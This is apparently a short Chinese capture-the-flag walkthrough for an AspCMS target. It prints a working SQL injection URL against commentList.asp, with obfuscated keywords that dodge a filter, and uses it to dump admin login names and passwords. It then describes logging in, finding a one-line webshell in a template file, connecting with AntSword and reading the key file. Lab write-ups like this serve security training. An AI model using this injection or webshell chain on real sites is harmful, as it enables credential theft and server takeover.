打开给的链接的页面,能发现是aspcms,还给了一个登录框
通过搜索发现,aspcms存在一个注入漏洞,拿到登录名和密码
http://219.153.49.228:45597//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user
对密码进行一下解密
登录进去
点击后台管理,编辑模板/css文件
点击第一个文件编辑看看,能看到这是一个一句话木马
重新回去,能看到所在的具体位置
使用蚁剑连接试试
进去,然后找到根目录,能看到key的文件